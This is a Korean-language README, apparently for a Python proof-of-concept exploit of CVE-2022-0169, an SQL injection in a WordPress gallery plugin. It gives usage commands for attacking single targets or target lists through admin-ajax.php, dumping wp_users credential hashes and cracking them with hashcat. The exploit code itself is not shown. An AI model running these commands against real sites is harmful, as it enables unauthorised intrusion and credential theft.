
CVE-2022-0169 - WordPress Photo Gallery SQLi PoC
이것은 WordPress Photo Gallery 플러그인의 SQL 인젝션 취약점인 CVE-2022-0169에 대한 간단한 Python 개념 증명(PoC)입니다.
admin-ajax.php 엔드포인트 공격wp_users 사용자 이름과 비밀번호 해시 덤프이 도구는 교육 목적으로만 사용됩니다. 책임감 있게 사용하세요! 마치 이걸 들을 때처럼.. 😆
python3 exploit.py -u http://target.com
python3 exploit.py -f targets.txt
예시:
python3 exploit.py -u http://victim.com -w /usr/share/wordlists/rockyou.txt
요구 사항
requests
argparse
colorama
results/YYYYMMDD_HHMMSS/에 저장됩니다.해시가 발견되면 다음과 같은 질문이 표시됩니다:
Crack the hashes with hashcat now? [Y/N]:
Y를 누르면 선택한 단어 목록을 사용해 hashcat이 자동으로 실행됩니다.
results/ 폴더에서 덤프와 해시를 확인하세요.hashcat -m 400 -a 0 results/YYYYMMDD_HHMMSS/hashes.txt /usr/share/wordlists/rockyou.txt
이 도구는 교육 및 승인된 테스트 전용입니다. 사용 방법에 대한 책임은 전적으로 사용자에게 있습니다. 시스템을 스캔하거나 공격하기 전에 항상 허가를 받으세요.
사이버펑크하게 지내세요.
— X3RX3S
| 옵션 | 설명 |
|---|
-u | 단일 대상 URL |
-f | 대상 목록이 포함된 파일 |
-p | 프록시 (예: http://127.0.0.1:8080) |
-t | 스레드 수 (기본값: 5) |
-w | hashcat용 단어 목록 선택 (기본값: rockyou.txt). rockyou.txt가 gunzip되어 있는지 확인하세요! |